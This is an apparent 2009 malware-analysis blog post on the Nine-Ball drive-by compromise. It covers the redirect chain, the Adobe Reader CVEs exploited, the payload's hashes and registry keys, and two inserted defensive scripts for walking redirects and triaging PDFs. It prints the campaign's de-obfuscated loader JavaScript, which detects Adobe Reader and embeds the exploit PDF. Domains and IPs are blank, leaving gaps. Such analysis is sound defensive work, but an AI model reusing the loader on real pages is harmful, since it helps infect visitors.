Friday, June 19, 2009

Nine-Ball Analysis

On 16 June 2009, Websense released an Alert concerning the latest drive-by web exploit dubbed Nine-Ball. Per Websense, “We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine.” The name Nine-Ball came from the final landing exploit site destination after a series of redirects: > > >

Further investigation reveals there are numerous landing exploit sites which dynamically change each time a victim host is redirected. Multiple connections from the same source IP address result in a redirect to the benign site. The exploit code on the landing site also appears to vary with each site.

The following is a sample redirect/exploit path followed from the base redirect:

Exploit Analysis
|-->HTTP 302 location redirect to
|---->meta http-equiv refresh redirect to
|------> HTTP 302 location and meta http-equiv refresh redirect to

All of the sites are hosted at (Eurohost LLC, AS48841, Ukraine)

The sites and appear to utilize cookies to track visitor requests. Multiple requests result in a redirect to the landing site.
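The multi-level chain above (an HTTP 302, then a meta refresh, then a hop that uses both) is the kind of thing an analyst wants to walk automatically rather than by hand, and because the redirectors key on cookies and source IP, each walk has to start from a clean client. The following script is an added example and not part of the original post: it parses both redirect mechanisms, resolves relative Location values, caps the hop count and detects loops. The responses and the .invalid hostnames are constructed stand-ins; the post does not reproduce the real domains.

```python
import re
from urllib.parse import urljoin

# Constructed responses for a redirect chain shaped like the one described above
# (302 -> meta refresh -> 302 plus meta refresh -> landing page). Hostnames use the
# reserved .invalid TLD; they are placeholders, not the campaign's real domains.
SAMPLE_RESPONSES = {
    "http://redirect-a.invalid/in.php": {
        "status": 302,
        "headers": {"Location": "http://redirect-b.invalid/go.php"},
        "body": "",
    },
    "http://redirect-b.invalid/go.php": {
        "status": 200,
        "headers": {},
        "body": '<html><head><meta content="0; URL=http://redirect-c.invalid/" '
                'http-equiv="refresh"></head><body></body></html>',
    },
    "http://redirect-c.invalid/": {
        # Both a 302 Location and a meta refresh, like the third hop in the post.
        "status": 302,
        "headers": {"location": "/land.php"},  # relative target, lower-case header name
        "body": '<meta http-equiv="refresh" content="0;url=/land.php">',
    },
    "http://redirect-c.invalid/land.php": {
        "status": 302,
        "headers": {"Location": "http://landing.invalid/index.php"},
        "body": "",
    },
    "http://landing.invalid/index.php": {
        "status": 200,
        "headers": {},
        "body": "<html><body><script>/* obfuscated loader would sit here */</script></body></html>",
    },
}

def sample_fetch(url):
    """Stand-in for an HTTP client: returns the constructed response or None."""
    return SAMPLE_RESPONSES.get(url)

META_TAG_RE = re.compile(r"<meta\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r'([\w-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s"\'>]+))')
REFRESH_URL_RE = re.compile(r"url\s*=\s*['\"]?([^'\"]+)", re.IGNORECASE)

def meta_refresh_target(html):
    """Return the URL from a <meta http-equiv="refresh"> tag, or None if absent."""
    for tag in META_TAG_RE.findall(html):
        attrs = {}
        for m in ATTR_RE.finditer(tag):
            attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
        if attrs.get("http-equiv", "").strip().lower() != "refresh":
            continue
        m = REFRESH_URL_RE.search(attrs.get("content", ""))
        if m:
            return m.group(1).strip()
    return None

def _header(headers, name):
    """Case-insensitive header lookup."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v
    return None

def follow_chain(start_url, fetch, max_hops=10):
    """Walk 3xx Location and meta-refresh hops; returns [(mechanism, url), ...]."""
    hops = [("start", start_url)]
    seen = {start_url}
    url = start_url
    for _ in range(max_hops):
        resp = fetch(url)
        if resp is None:
            hops.append(("unreachable", url))
            break
        nxt, how = None, None
        if 300 <= resp["status"] < 400:
            loc = _header(resp.get("headers", {}), "Location")
            if loc:
                nxt, how = urljoin(url, loc), str(resp["status"])
        if nxt is None:  # no usable Location header: fall back to the HTML body
            target = meta_refresh_target(resp.get("body", ""))
            if target:
                nxt, how = urljoin(url, target), "meta-refresh"
        if nxt is None:
            break  # nothing redirects further: this is the landing page
        if nxt in seen:
            hops.append(("loop", nxt))
            break
        hops.append((how, nxt))
        seen.add(nxt)
        url = nxt
    return hops

if __name__ == "__main__":
    for how, u in follow_chain("http://redirect-a.invalid/in.php", sample_fetch):
        print(how.ljust(12), u)
```

When pointing this at live infrastructure the `fetch` callable would be a real HTTP client; given the cookie and source-IP tracking noted above, run each walk with a fresh cookie jar and expect the chain to end at the benign site on repeat visits from the same address.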

The site returns obfuscated JavaScript that decodes to reveal an EMBED tag that references pdf.php.

function FVEopW91F0QKb(){
    var Qqz8W8MiQQlAc = false;
    try {
        // Walk the plugin list looking for an Adobe Acrobat/Reader plugin
        if (navigator.plugins && navigator.mimeTypes.length){
            for (var apjVVQ1jEqGNq = 0; apjVVQ1jEqGNq < navigator.plugins.length; apjVVQ1jEqGNq++){
                var iWHp9Og8VDFsw = navigator.plugins[apjVVQ1jEqGNq].name;
                if (iWHp9Og8VDFsw.indexOf("Adobe Acrobat") != -1){
                    Qqz8W8MiQQlAc = true;
                    break;
                }
            }
        }
    } catch (e){
        // Errors from browsers without navigator.plugins are silently ignored
    }
    if (Qqz8W8MiQQlAc){
        // Only when the plugin is present: write the EMBED tag that fetches pdf.php
        // (document.write is assumed; the call itself was lost from the decoded listing)
        document.write('<EMBED SRC="pdf.php" WIDTH="36" HEIGHT="14" TYPE="application/pdf" /></EMBED>');
    }
    else return false;
}
setTimeout("FVEopW91F0QKb();", 500);

The pdf.php request returned a PDF file named What_is_Unique_Pack.pdf. The filename refers to the Unique Pack exploit toolkit discussed by Finjan.

File: What_is_Unique_Pack.pdf
Size: 15139
MD5: 2C8144C3927A33598FEBFFBFC61B6EA9

The PDF file meta data indicates it was created June 6, 2009 using Nitro PDF Professional 6.0 and print driver BCL easyPDF 6.00.20.

/Creator (NitroPDF 6.0)
/Producer (BCL easyPDF 6.00.20)
/ModDate (D:20090606123256+02'00')
/CreationDate (D:20090606123026+03'00')

The PDF contains obfuscated JavaScript that decodes to reveal 3 exploits targeted against Adobe Reader vulnerabilities.

• Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19)
• Collab.collectEmailInfo() JavaScript Method Remote Code Execution Vulnerability (CVE-2007-5659, APSB08-13)
• Collab.getIcon() JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927, APSB09-04)

All of the exploits result in the GET request for downloaded as load.exe.
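Two of the things worth automating from the PDF section above are the metadata check (the /CreationDate and /ModDate strings carry different UTC offsets, so they only compare sensibly once normalised) and a first-pass scan for JavaScript and the three Reader API names in the exploit list, including inside Flate-compressed streams. The script below is an added example, not code from the post or from any PDF tool; it builds its own tiny test PDF whose stream merely references two of the API names, and its date parser treats a missing offset as UTC, which is an assumption rather than what the PDF specification mandates.

```python
import re
import zlib
from datetime import datetime, timedelta, timezone

# Indicators worth a second look in triage: action/JavaScript keys plus the three
# Reader API names from the exploit list above.
INDICATORS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
              b"util.printf", b"Collab.collectEmailInfo", b"Collab.getIcon"]

# One stream object: its dictionary, then the (possibly compressed) body.
# Limitation: nested << >> inside the stream dictionary is not handled.
STREAM_RE = re.compile(rb"(<<(?:(?!>>).)*>>)\s*stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# PDF date string: D:YYYYMMDDHHmmSS followed by an optional +HH'mm' / -HH'mm' / Z offset.
PDF_DATE_RE = re.compile(r"D:(\d{4})(\d{2})?(\d{2})?(\d{2})?(\d{2})?(\d{2})?"
                         r"(?:([+\-Z])(?:(\d{2})'?(\d{2})?'?)?)?")

def build_sample_pdf():
    """Constructed test input: a minimal PDF whose OpenAction runs a Flate-compressed
    JavaScript stream that only references two API names (no exploit code)."""
    js = b'var n = "x"; Collab.getIcon(n); util.printf("%s", n);'
    packed = zlib.compress(js)
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",
        b"<< /S /JavaScript /JS 4 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(packed) + packed + b"\nendstream",
        b"<< /Creator (NitroPDF 6.0) /Producer (BCL easyPDF 6.00.20) "
        b"/CreationDate (D:20090606123026+03'00') /ModDate (D:20090606123256+02'00') >>",
    ]
    out = b"%PDF-1.4\n"
    for i, body in enumerate(objs, 1):
        out += b"%d 0 obj\n" % i + body + b"\nendobj\n"
    out += b"trailer\n<< /Root 1 0 R /Info 5 0 R >>\n%%EOF\n"
    return out

def parse_pdf_date(text):
    """Parse a PDF date string into an aware datetime (missing offset -> UTC, an assumption)."""
    m = PDF_DATE_RE.match(text.strip())
    if not m:
        raise ValueError("not a PDF date: %r" % text)
    y, mo, d, h, mi, s, sign, oh, om = m.groups()
    tz = timezone.utc
    if sign in ("+", "-") and oh:
        off = timedelta(hours=int(oh), minutes=int(om or 0))
        tz = timezone(off if sign == "+" else -off)
    return datetime(int(y), int(mo or 1), int(d or 1), int(h or 0), int(mi or 0), int(s or 0), tzinfo=tz)

def triage_pdf(data):
    """Inflate FlateDecode streams, then report which indicators and Info fields appear."""
    decoded = []
    for dict_bytes, raw in STREAM_RE.findall(data):
        if b"/FlateDecode" in dict_bytes:
            try:
                decoded.append(zlib.decompress(raw))
            except zlib.error:
                pass  # truncated or deliberately corrupt stream: flag for manual review
    haystack = data + b"\n" + b"\n".join(decoded)
    found = [ind.decode() for ind in INDICATORS if ind in haystack]
    info = {}
    for key in (b"Creator", b"Producer", b"CreationDate", b"ModDate"):
        m = re.search(rb"/" + key + rb"\s*\(([^)]*)\)", data)
        if m:
            info[key.decode()] = m.group(1).decode("latin-1")
    return {"indicators": found, "info": info}

def modification_gap_seconds(info):
    """Seconds between /CreationDate and /ModDate after normalising both to UTC."""
    created = parse_pdf_date(info["CreationDate"]).astimezone(timezone.utc)
    modified = parse_pdf_date(info["ModDate"]).astimezone(timezone.utc)
    return int((modified - created).total_seconds())

if __name__ == "__main__":
    report = triage_pdf(build_sample_pdf())
    print("indicators:", ", ".join(report["indicators"]))
    print("info:", report["info"])
    print("created->modified gap (s):", modification_gap_seconds(report["info"]))
```

Applied to the metadata quoted above, the +03'00' creation time and +02'00' modification time are about an hour apart in UTC, so the two stamps are consistent with one authoring session rather than a forged or clock-skewed pair. The indicator list is a hint for where to spend analyst time, not a verdict; a hit on /JS or /OpenAction is routine in benign forms too.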

Malware Analysis

The malware load.exe creates mscorewr.dll, which Microsoft detects as Win32/Silentbanker.B. As of 2009.06.20 02:30:08 (UTC) only 2/41 antivirus vendors detect the malware.


File: load.exe
Size: 69632
MD5: 801EFE85BEF379E50B882F7B5846DB7A

The malware load.exe creates the following file and registry entries.


File: mscorewr.dll
Size: 86016
MD5: 33C03C3768610765A06CB112CABAA00A

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000} "(Default)"
Type: REG_SZ
Data: mscorewr
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\mscorewr.dll
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\TypeLib "(Default)"
Type: REG_SZ

Domain/IP Analysis

The 3 initial redirect domains,, and resolve to (Eurohost LLC, AS48841, Ukraine). The following domains also currently resolve to

The below table lists domain registration data for the domains hosted at

Domain    Registration Provider    Registration Date    Registrant Country
          WebCC Ltd.               2009-06-15           RU
          WebCC Ltd.               2009-05-17           RU
          WebCC Ltd.               2009-06-03           RU
          WebCC Ltd.               2009-06-09           RU
          WebCC Ltd.               2009-06-15           RU
          WebCC Ltd.               2009-06-12           RU
          WebCC Ltd.               2009-06-12           RU
          SKILLTEX                 2009-05-18           RU

Redirect testing identified that the exploit landing site rotated between several sites. The following sites were observed in addition to the one mentioned above. Each of the exploit landing sites used different obfuscation techniques, exploits and payload downloads.

(, NL)
(, US)
(, LV)
(, CN)
(, RU)
(, US)

On 22 June 2009, ScanSafe called out Websense's reporting numbers and stated Nine-Ball was a bunch of hype. Let the fireworks begin...
